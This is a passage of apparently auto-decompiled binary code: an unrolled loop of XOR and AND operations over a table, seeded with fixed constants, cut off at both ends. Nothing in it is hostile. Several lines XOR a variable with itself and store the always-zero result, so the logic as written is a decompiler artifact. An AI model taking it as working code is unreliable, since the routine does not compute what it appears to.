                                                                                  				intOrPtr _t2059;
                                                                                  				intOrPtr _t2064;
                                                                                  				intOrPtr _t2065;
                                                                                  				intOrPtr _t2066;
                                                                                  				intOrPtr _t2071;
                                                                                  				intOrPtr _t2072;
                                                                                  				intOrPtr _t2073;
                                                                                  				intOrPtr _t2078;
                                                                                  				intOrPtr _t2079;
                                                                                  				intOrPtr _t2080;
                                                                                  				intOrPtr _t2085;
                                                                                  				intOrPtr _t2086;
                                                                                  				intOrPtr _t2087;
                                                                                  				intOrPtr _t2092;
                                                                                  				intOrPtr _t2093;
                                                                                  				intOrPtr _t2094;
                                                                                  				intOrPtr _t2099;
                                                                                  				intOrPtr _t2100;
                                                                                  				intOrPtr _t2101;
                                                                                  				intOrPtr _t2106;
                                                                                  				intOrPtr _t2107;
                                                                                  				intOrPtr _t2108;
                                                                                  				intOrPtr _t2113;
                                                                                  				intOrPtr _t2114;
                                                                                  				intOrPtr _t2115;
                                                                                  				intOrPtr _t2120;
                                                                                  				intOrPtr _t2121;
                                                                                  				intOrPtr _t2122;
                                                                                  				intOrPtr _t2127;
                                                                                  				intOrPtr _t2128;
                                                                                  				intOrPtr _t2129;
                                                                                  				intOrPtr _t2134;
                                                                                  				intOrPtr _t2135;
                                                                                  				intOrPtr _t2136;
                                                                                  				intOrPtr _t2141;
                                                                                  				intOrPtr _t2142;
                                                                                  				intOrPtr _t2143;
                                                                                  				intOrPtr _t2148;
                                                                                  				intOrPtr _t2149;
                                                                                  				intOrPtr _t2150;
                                                                                  
                                                                                  				_t1394 =  *0x411128; // 0x89abcdef
                                                                                  				_v28 = _t1394;
                                                                                  				_t1577 =  *0x41112c; // 0x1234567
                                                                                  				_v24 = _t1577;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0x59;
                                                                                  				while(1) {
                                                                                  					_t1396 = _a8 << 4;
                                                                                  					if(_v32 >= _t1396) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1397 = _v16;
                                                                                  					_t1579 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1579 + _t1397 * 8 - 0x2c8);
                                                                                  					_v8 = _v8 ^  *(_t1579 + _t1397 * 8 - 0x2c4);
                                                                                  					_t1398 = _v16;
                                                                                  					_t1580 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1580 + _t1398 * 8 - 0x88);
                                                                                  					_v8 = _v8 ^  *(_t1580 + _t1398 * 8 - 0x84);
                                                                                  					_t1399 = _v16;
                                                                                  					_t1581 = _a4;
                                                                                  					_t1748 = _v16;
                                                                                  					_t2043 = _a4;
                                                                                  					_v12 =  *(_t1581 + _t1399 * 8 - 0x90) &  *(_t2043 + _t1748 * 8 - 0xa8) ^ _v12;
                                                                                  					_v8 =  *(_t1581 + _t1399 * 8 - 0x8c) &  *(_t2043 + _t1748 * 8 - 0xa4) ^ _v8;
                                                                                  					_t1582 = _v16;
                                                                                  					_t1749 = _a4;
                                                                                  					_t1403 = _v16;
                                                                                  					_t2044 = _a4;
                                                                                  					_v12 =  *(_t1749 + _t1582 * 8 - 0xf8) &  *(_t2044 + _t1403 * 8 - 0x218) ^ _v12;
                                                                                  					_v8 =  *(_t1749 + _t1582 * 8 - 0xf4) &  *(_t2044 + _t1403 * 8 - 0x214) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1588 = _v16;
                                                                                  					_t2045 = _a4;
                                                                                  					 *(_t2045 + _t1588 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2045 + 4 + _t1588 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1589 = _v16;
                                                                                  					_t1755 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1755 + _t1589 * 8 - 0x2c0);
                                                                                  					_v8 = _v8 ^  *(_t1755 + _t1589 * 8 - 0x2bc);
                                                                                  					_t1590 = _v16;
                                                                                  					_t1756 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1756 + _t1590 * 8 - 0x80);
                                                                                  					_v8 = _v8 ^  *(_t1756 + _t1590 * 8 - 0x7c);
                                                                                  					_t1591 = _v16;
                                                                                  					_t1757 = _a4;
                                                                                  					_t1413 = _v16;
                                                                                  					_t2050 = _a4;
                                                                                  					_v12 =  *(_t1757 + _t1591 * 8 - 0x88) &  *(_t2050 + _t1413 * 8 - 0xa0) ^ _v12;
                                                                                  					_v8 =  *(_t1757 + _t1591 * 8 - 0x84) &  *(_t2050 + _t1413 * 8 - 0x9c) ^ _v8;
                                                                                  					_t1758 = _v16;
                                                                                  					_t1414 = _a4;
                                                                                  					_t1595 = _v16;
                                                                                  					_t2051 = _a4;
                                                                                  					_v12 =  *(_t1414 + _t1758 * 8 - 0xf0) &  *(_t2051 + _t1595 * 8 - 0x210) ^ _v12;
                                                                                  					_v8 =  *(_t1414 + _t1758 * 8 - 0xec) &  *(_t2051 + _t1595 * 8 - 0x20c) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1598 = _v16;
                                                                                  					_t2052 = _a4;
                                                                                  					 *(_t2052 + 8 + _t1598 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2052 + 0xc + _t1598 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1599 = _v16;
                                                                                  					_t1767 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1767 + _t1599 * 8 - 0x2b8);
                                                                                  					_v8 = _v8 ^  *(_t1767 + _t1599 * 8 - 0x2b4);
                                                                                  					_t1600 = _v16;
                                                                                  					_t1768 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1768 + _t1600 * 8 - 0x78);
                                                                                  					_v8 = _v8 ^  *(_t1768 + _t1600 * 8 - 0x74);
                                                                                  					_t1601 = _v16;
                                                                                  					_t1769 = _a4;
                                                                                  					_t1424 = _v16;
                                                                                  					_t2057 = _a4;
                                                                                  					_v12 =  *(_t1769 + _t1601 * 8 - 0x80) &  *(_t2057 + _t1424 * 8 - 0x98) ^ _v12;
                                                                                  					_v8 =  *(_t1769 + _t1601 * 8 - 0x7c) &  *(_t2057 + _t1424 * 8 - 0x94) ^ _v8;
                                                                                  					_t1770 = _v16;
                                                                                  					_t1425 = _a4;
                                                                                  					_t1605 = _v16;
                                                                                  					_t2058 = _a4;
                                                                                  					_v12 =  *(_t1425 + _t1770 * 8 - 0xe8) &  *(_t2058 + _t1605 * 8 - 0x208) ^ _v12;
                                                                                  					_v8 =  *(_t1425 + _t1770 * 8 - 0xe4) &  *(_t2058 + _t1605 * 8 - 0x204) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1608 = _v16;
                                                                                  					_t2059 = _a4;
                                                                                  					 *(_t2059 + 0x10 + _t1608 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2059 + 0x14 + _t1608 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1609 = _v16;
                                                                                  					_t1779 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1779 + _t1609 * 8 - 0x2b0);
                                                                                  					_v8 = _v8 ^  *(_t1779 + _t1609 * 8 - 0x2ac);
                                                                                  					_t1610 = _v16;
                                                                                  					_t1780 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1780 + _t1610 * 8 - 0x70);
                                                                                  					_v8 = _v8 ^  *(_t1780 + _t1610 * 8 - 0x6c);
                                                                                  					_t1611 = _v16;
                                                                                  					_t1781 = _a4;
                                                                                  					_t1435 = _v16;
                                                                                  					_t2064 = _a4;
                                                                                  					_v12 =  *(_t1781 + _t1611 * 8 - 0x78) &  *(_t2064 + _t1435 * 8 - 0x90) ^ _v12;
                                                                                  					_v8 =  *(_t1781 + _t1611 * 8 - 0x74) &  *(_t2064 + _t1435 * 8 - 0x8c) ^ _v8;
                                                                                  					_t1782 = _v16;
                                                                                  					_t1436 = _a4;
                                                                                  					_t1615 = _v16;
                                                                                  					_t2065 = _a4;
                                                                                  					_v12 =  *(_t1436 + _t1782 * 8 - 0xe0) &  *(_t2065 + _t1615 * 8 - 0x200) ^ _v12;
                                                                                  					_v8 =  *(_t1436 + _t1782 * 8 - 0xdc) &  *(_t2065 + _t1615 * 8 - 0x1fc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1618 = _v16;
                                                                                  					_t2066 = _a4;
                                                                                  					 *(_t2066 + 0x18 + _t1618 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2066 + 0x1c + _t1618 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1619 = _v16;
                                                                                  					_t1791 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1791 + _t1619 * 8 - 0x2a8);
                                                                                  					_v8 = _v8 ^  *(_t1791 + _t1619 * 8 - 0x2a4);
                                                                                  					_t1620 = _v16;
                                                                                  					_t1792 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1792 + _t1620 * 8 - 0x68);
                                                                                  					_v8 = _v8 ^  *(_t1792 + _t1620 * 8 - 0x64);
                                                                                  					_t1621 = _v16;
                                                                                  					_t1793 = _a4;
                                                                                  					_t1446 = _v16;
                                                                                  					_t2071 = _a4;
                                                                                  					_v12 =  *(_t1793 + _t1621 * 8 - 0x70) &  *(_t2071 + _t1446 * 8 - 0x88) ^ _v12;
                                                                                  					_v8 =  *(_t1793 + _t1621 * 8 - 0x6c) &  *(_t2071 + _t1446 * 8 - 0x84) ^ _v8;
                                                                                  					_t1794 = _v16;
                                                                                  					_t1447 = _a4;
                                                                                  					_t1625 = _v16;
                                                                                  					_t2072 = _a4;
                                                                                  					_v12 =  *(_t1447 + _t1794 * 8 - 0xd8) &  *(_t2072 + _t1625 * 8 - 0x1f8) ^ _v12;
                                                                                  					_v8 =  *(_t1447 + _t1794 * 8 - 0xd4) &  *(_t2072 + _t1625 * 8 - 0x1f4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1628 = _v16;
                                                                                  					_t2073 = _a4;
                                                                                  					 *(_t2073 + 0x20 + _t1628 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2073 + 0x24 + _t1628 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1629 = _v16;
                                                                                  					_t1803 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1803 + _t1629 * 8 - 0x2a0);
                                                                                  					_v8 = _v8 ^  *(_t1803 + _t1629 * 8 - 0x29c);
                                                                                  					_t1630 = _v16;
                                                                                  					_t1804 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1804 + _t1630 * 8 - 0x60);
                                                                                  					_v8 = _v8 ^  *(_t1804 + _t1630 * 8 - 0x5c);
                                                                                  					_t1631 = _v16;
                                                                                  					_t1805 = _a4;
                                                                                  					_t1457 = _v16;
                                                                                  					_t2078 = _a4;
                                                                                  					_v12 =  *(_t1805 + _t1631 * 8 - 0x68) &  *(_t2078 + _t1457 * 8 - 0x80) ^ _v12;
                                                                                  					_v8 =  *(_t1805 + _t1631 * 8 - 0x64) &  *(_t2078 + _t1457 * 8 - 0x7c) ^ _v8;
                                                                                  					_t1806 = _v16;
                                                                                  					_t1458 = _a4;
                                                                                  					_t1635 = _v16;
                                                                                  					_t2079 = _a4;
                                                                                  					_v12 =  *(_t1458 + _t1806 * 8 - 0xd0) &  *(_t2079 + _t1635 * 8 - 0x1f0) ^ _v12;
                                                                                  					_v8 =  *(_t1458 + _t1806 * 8 - 0xcc) &  *(_t2079 + _t1635 * 8 - 0x1ec) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1638 = _v16;
                                                                                  					_t2080 = _a4;
                                                                                  					 *(_t2080 + 0x28 + _t1638 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2080 + 0x2c + _t1638 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1639 = _v16;
                                                                                  					_t1815 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1815 + _t1639 * 8 - 0x298);
                                                                                  					_v8 = _v8 ^  *(_t1815 + _t1639 * 8 - 0x294);
                                                                                  					_t1640 = _v16;
                                                                                  					_t1816 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1816 + _t1640 * 8 - 0x58);
                                                                                  					_v8 = _v8 ^  *(_t1816 + _t1640 * 8 - 0x54);
                                                                                  					_t1641 = _v16;
                                                                                  					_t1817 = _a4;
                                                                                  					_t1468 = _v16;
                                                                                  					_t2085 = _a4;
                                                                                  					_v12 =  *(_t1817 + _t1641 * 8 - 0x60) &  *(_t2085 + _t1468 * 8 - 0x78) ^ _v12;
                                                                                  					_v8 =  *(_t1817 + _t1641 * 8 - 0x5c) &  *(_t2085 + _t1468 * 8 - 0x74) ^ _v8;
                                                                                  					_t1818 = _v16;
                                                                                  					_t1469 = _a4;
                                                                                  					_t1645 = _v16;
                                                                                  					_t2086 = _a4;
                                                                                  					_v12 =  *(_t1469 + _t1818 * 8 - 0xc8) &  *(_t2086 + _t1645 * 8 - 0x1e8) ^ _v12;
                                                                                  					_v8 =  *(_t1469 + _t1818 * 8 - 0xc4) &  *(_t2086 + _t1645 * 8 - 0x1e4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1648 = _v16;
                                                                                  					_t2087 = _a4;
                                                                                  					 *(_t2087 + 0x30 + _t1648 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2087 + 0x34 + _t1648 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1649 = _v16;
                                                                                  					_t1827 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1827 + _t1649 * 8 - 0x290);
                                                                                  					_v8 = _v8 ^  *(_t1827 + _t1649 * 8 - 0x28c);
                                                                                  					_t1650 = _v16;
                                                                                  					_t1828 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1828 + _t1650 * 8 - 0x50);
                                                                                  					_v8 = _v8 ^  *(_t1828 + _t1650 * 8 - 0x4c);
                                                                                  					_t1651 = _v16;
                                                                                  					_t1829 = _a4;
                                                                                  					_t1479 = _v16;
                                                                                  					_t2092 = _a4;
                                                                                  					_v12 =  *(_t1829 + _t1651 * 8 - 0x58) &  *(_t2092 + _t1479 * 8 - 0x70) ^ _v12;
                                                                                  					_v8 =  *(_t1829 + _t1651 * 8 - 0x54) &  *(_t2092 + _t1479 * 8 - 0x6c) ^ _v8;
                                                                                  					_t1830 = _v16;
                                                                                  					_t1480 = _a4;
                                                                                  					_t1655 = _v16;
                                                                                  					_t2093 = _a4;
                                                                                  					_v12 =  *(_t1480 + _t1830 * 8 - 0xc0) &  *(_t2093 + _t1655 * 8 - 0x1e0) ^ _v12;
                                                                                  					_v8 =  *(_t1480 + _t1830 * 8 - 0xbc) &  *(_t2093 + _t1655 * 8 - 0x1dc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1658 = _v16;
                                                                                  					_t2094 = _a4;
                                                                                  					 *(_t2094 + 0x38 + _t1658 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2094 + 0x3c + _t1658 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1659 = _v16;
                                                                                  					_t1839 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1839 + _t1659 * 8 - 0x288);
                                                                                  					_v8 = _v8 ^  *(_t1839 + _t1659 * 8 - 0x284);
                                                                                  					_t1660 = _v16;
                                                                                  					_t1840 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1840 + _t1660 * 8 - 0x48);
                                                                                  					_v8 = _v8 ^  *(_t1840 + _t1660 * 8 - 0x44);
                                                                                  					_t1661 = _v16;
                                                                                  					_t1841 = _a4;
                                                                                  					_t1490 = _v16;
                                                                                  					_t2099 = _a4;
                                                                                  					_v12 =  *(_t1841 + _t1661 * 8 - 0x50) &  *(_t2099 + _t1490 * 8 - 0x68) ^ _v12;
                                                                                  					_v8 =  *(_t1841 + _t1661 * 8 - 0x4c) &  *(_t2099 + _t1490 * 8 - 0x64) ^ _v8;
                                                                                  					_t1842 = _v16;
                                                                                  					_t1491 = _a4;
                                                                                  					_t1665 = _v16;
                                                                                  					_t2100 = _a4;
                                                                                  					_v12 =  *(_t1491 + _t1842 * 8 - 0xb8) &  *(_t2100 + _t1665 * 8 - 0x1d8) ^ _v12;
                                                                                  					_v8 =  *(_t1491 + _t1842 * 8 - 0xb4) &  *(_t2100 + _t1665 * 8 - 0x1d4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1668 = _v16;
                                                                                  					_t2101 = _a4;
                                                                                  					 *(_t2101 + 0x40 + _t1668 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2101 + 0x44 + _t1668 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1669 = _v16;
                                                                                  					_t1851 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1851 + _t1669 * 8 - 0x280);
                                                                                  					_v8 = _v8 ^  *(_t1851 + _t1669 * 8 - 0x27c);
                                                                                  					_t1670 = _v16;
                                                                                  					_t1852 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1852 + _t1670 * 8 - 0x40);
                                                                                  					_v8 = _v8 ^  *(_t1852 + _t1670 * 8 - 0x3c);
                                                                                  					_t1671 = _v16;
                                                                                  					_t1853 = _a4;
                                                                                  					_t1501 = _v16;
                                                                                  					_t2106 = _a4;
                                                                                  					_v12 =  *(_t1853 + _t1671 * 8 - 0x48) &  *(_t2106 + _t1501 * 8 - 0x60) ^ _v12;
                                                                                  					_v8 =  *(_t1853 + _t1671 * 8 - 0x44) &  *(_t2106 + _t1501 * 8 - 0x5c) ^ _v8;
                                                                                  					_t1854 = _v16;
                                                                                  					_t1502 = _a4;
                                                                                  					_t1675 = _v16;
                                                                                  					_t2107 = _a4;
                                                                                  					_v12 =  *(_t1502 + _t1854 * 8 - 0xb0) &  *(_t2107 + _t1675 * 8 - 0x1d0) ^ _v12;
                                                                                  					_v8 =  *(_t1502 + _t1854 * 8 - 0xac) &  *(_t2107 + _t1675 * 8 - 0x1cc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1678 = _v16;
                                                                                  					_t2108 = _a4;
                                                                                  					 *(_t2108 + 0x48 + _t1678 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2108 + 0x4c + _t1678 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1679 = _v16;
                                                                                  					_t1863 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1863 + _t1679 * 8 - 0x278);
                                                                                  					_v8 = _v8 ^  *(_t1863 + _t1679 * 8 - 0x274);
                                                                                  					_t1680 = _v16;
                                                                                  					_t1864 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1864 + _t1680 * 8 - 0x38);
                                                                                  					_v8 = _v8 ^  *(_t1864 + _t1680 * 8 - 0x34);
                                                                                  					_t1681 = _v16;
                                                                                  					_t1865 = _a4;
                                                                                  					_t1512 = _v16;
                                                                                  					_t2113 = _a4;
                                                                                  					_v12 =  *(_t1865 + _t1681 * 8 - 0x40) &  *(_t2113 + _t1512 * 8 - 0x58) ^ _v12;
                                                                                  					_v8 =  *(_t1865 + _t1681 * 8 - 0x3c) &  *(_t2113 + _t1512 * 8 - 0x54) ^ _v8;
                                                                                  					_t1866 = _v16;
                                                                                  					_t1513 = _a4;
                                                                                  					_t1685 = _v16;
                                                                                  					_t2114 = _a4;
                                                                                  					_v12 =  *(_t1513 + _t1866 * 8 - 0xa8) &  *(_t2114 + _t1685 * 8 - 0x1c8) ^ _v12;
                                                                                  					_v8 =  *(_t1513 + _t1866 * 8 - 0xa4) &  *(_t2114 + _t1685 * 8 - 0x1c4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1688 = _v16;
                                                                                  					_t2115 = _a4;
                                                                                  					 *(_t2115 + 0x50 + _t1688 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2115 + 0x54 + _t1688 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1689 = _v16;
                                                                                  					_t1875 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1875 + _t1689 * 8 - 0x270);
                                                                                  					_v8 = _v8 ^  *(_t1875 + _t1689 * 8 - 0x26c);
                                                                                  					_t1690 = _v16;
                                                                                  					_t1876 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1876 + _t1690 * 8 - 0x30);
                                                                                  					_v8 = _v8 ^  *(_t1876 + _t1690 * 8 - 0x2c);
                                                                                  					_t1691 = _v16;
                                                                                  					_t1877 = _a4;
                                                                                  					_t1523 = _v16;
                                                                                  					_t2120 = _a4;
                                                                                  					_v12 =  *(_t1877 + _t1691 * 8 - 0x38) &  *(_t2120 + _t1523 * 8 - 0x50) ^ _v12;
                                                                                  					_v8 =  *(_t1877 + _t1691 * 8 - 0x34) &  *(_t2120 + _t1523 * 8 - 0x4c) ^ _v8;
                                                                                  					_t1878 = _v16;
                                                                                  					_t1524 = _a4;
                                                                                  					_t1695 = _v16;
                                                                                  					_t2121 = _a4;
                                                                                  					_v12 =  *(_t1524 + _t1878 * 8 - 0xa0) &  *(_t2121 + _t1695 * 8 - 0x1c0) ^ _v12;
                                                                                  					_v8 =  *(_t1524 + _t1878 * 8 - 0x9c) &  *(_t2121 + _t1695 * 8 - 0x1bc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1698 = _v16;
                                                                                  					_t2122 = _a4;
                                                                                  					 *(_t2122 + 0x58 + _t1698 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2122 + 0x5c + _t1698 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1699 = _v16;
                                                                                  					_t1887 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1887 + _t1699 * 8 - 0x268);
                                                                                  					_v8 = _v8 ^  *(_t1887 + _t1699 * 8 - 0x264);
                                                                                  					_t1700 = _v16;
                                                                                  					_t1888 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1888 + _t1700 * 8 - 0x28);
                                                                                  					_v8 = _v8 ^  *(_t1888 + _t1700 * 8 - 0x24);
                                                                                  					_t1701 = _v16;
                                                                                  					_t1889 = _a4;
                                                                                  					_t1534 = _v16;
                                                                                  					_t2127 = _a4;
                                                                                  					_v12 =  *(_t1889 + _t1701 * 8 - 0x30) &  *(_t2127 + _t1534 * 8 - 0x48) ^ _v12;
                                                                                  					_v8 =  *(_t1889 + _t1701 * 8 - 0x2c) &  *(_t2127 + _t1534 * 8 - 0x44) ^ _v8;
                                                                                  					_t1890 = _v16;
                                                                                  					_t1535 = _a4;
                                                                                  					_t1705 = _v16;
                                                                                  					_t2128 = _a4;
                                                                                  					_v12 =  *(_t1535 + _t1890 * 8 - 0x98) &  *(_t2128 + _t1705 * 8 - 0x1b8) ^ _v12;
                                                                                  					_v8 =  *(_t1535 + _t1890 * 8 - 0x94) &  *(_t2128 + _t1705 * 8 - 0x1b4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1708 = _v16;
                                                                                  					_t2129 = _a4;
                                                                                  					 *(_t2129 + 0x60 + _t1708 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2129 + 0x64 + _t1708 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1709 = _v16;
                                                                                  					_t1899 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1899 + _t1709 * 8 - 0x260);
                                                                                  					_v8 = _v8 ^  *(_t1899 + _t1709 * 8 - 0x25c);
                                                                                  					_t1710 = _v16;
                                                                                  					_t1900 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1900 + _t1710 * 8 - 0x20);
                                                                                  					_v8 = _v8 ^  *(_t1900 + _t1710 * 8 - 0x1c);
                                                                                  					_t1711 = _v16;
                                                                                  					_t1901 = _a4;
                                                                                  					_t1545 = _v16;
                                                                                  					_t2134 = _a4;
                                                                                  					_v12 =  *(_t1901 + _t1711 * 8 - 0x28) &  *(_t2134 + _t1545 * 8 - 0x40) ^ _v12;
                                                                                  					_v8 =  *(_t1901 + _t1711 * 8 - 0x24) &  *(_t2134 + _t1545 * 8 - 0x3c) ^ _v8;
                                                                                  					_t1902 = _v16;
                                                                                  					_t1546 = _a4;
                                                                                  					_t1715 = _v16;
                                                                                  					_t2135 = _a4;
                                                                                  					_v12 =  *(_t1546 + _t1902 * 8 - 0x90) &  *(_t2135 + _t1715 * 8 - 0x1b0) ^ _v12;
                                                                                  					_v8 =  *(_t1546 + _t1902 * 8 - 0x8c) &  *(_t2135 + _t1715 * 8 - 0x1ac) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1718 = _v16;
                                                                                  					_t2136 = _a4;
                                                                                  					 *(_t2136 + 0x68 + _t1718 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2136 + 0x6c + _t1718 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1719 = _v16;
                                                                                  					_t1911 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1911 + _t1719 * 8 - 0x258);
                                                                                  					_v8 = _v8 ^  *(_t1911 + _t1719 * 8 - 0x254);
                                                                                  					_t1720 = _v16;
                                                                                  					_t1912 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1912 + _t1720 * 8 - 0x18);
                                                                                  					_v8 = _v8 ^  *(_t1912 + _t1720 * 8 - 0x14);
                                                                                  					_t1721 = _v16;
                                                                                  					_t1913 = _a4;
                                                                                  					_t1556 = _v16;
                                                                                  					_t2141 = _a4;
                                                                                  					_v12 =  *(_t1913 + _t1721 * 8 - 0x20) &  *(_t2141 + _t1556 * 8 - 0x38) ^ _v12;
                                                                                  					_v8 =  *(_t1913 + _t1721 * 8 - 0x1c) &  *(_t2141 + _t1556 * 8 - 0x34) ^ _v8;
                                                                                  					_t1914 = _v16;
                                                                                  					_t1557 = _a4;
                                                                                  					_t1725 = _v16;
                                                                                  					_t2142 = _a4;
                                                                                  					_v12 =  *(_t1557 + _t1914 * 8 - 0x88) &  *(_t2142 + _t1725 * 8 - 0x1a8) ^ _v12;
                                                                                  					_v8 =  *(_t1557 + _t1914 * 8 - 0x84) &  *(_t2142 + _t1725 * 8 - 0x1a4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1728 = _v16;
                                                                                  					_t2143 = _a4;
                                                                                  					 *(_t2143 + 0x70 + _t1728 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2143 + 0x74 + _t1728 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1729 = _v16;
                                                                                  					_t1923 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1923 + _t1729 * 8 - 0x250);
                                                                                  					_v8 = _v8 ^  *(_t1923 + _t1729 * 8 - 0x24c);
                                                                                  					_t1730 = _v16;
                                                                                  					_t1924 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1924 + _t1730 * 8 - 0x10);
                                                                                  					_v8 = _v8 ^  *(_t1924 + _t1730 * 8 - 0xc);
                                                                                  					_t1731 = _v16;
                                                                                  					_t1925 = _a4;
                                                                                  					_t1567 = _v16;
                                                                                  					_t2148 = _a4;
                                                                                  					_v12 =  *(_t1925 + _t1731 * 8 - 0x18) &  *(_t2148 + _t1567 * 8 - 0x30) ^ _v12;
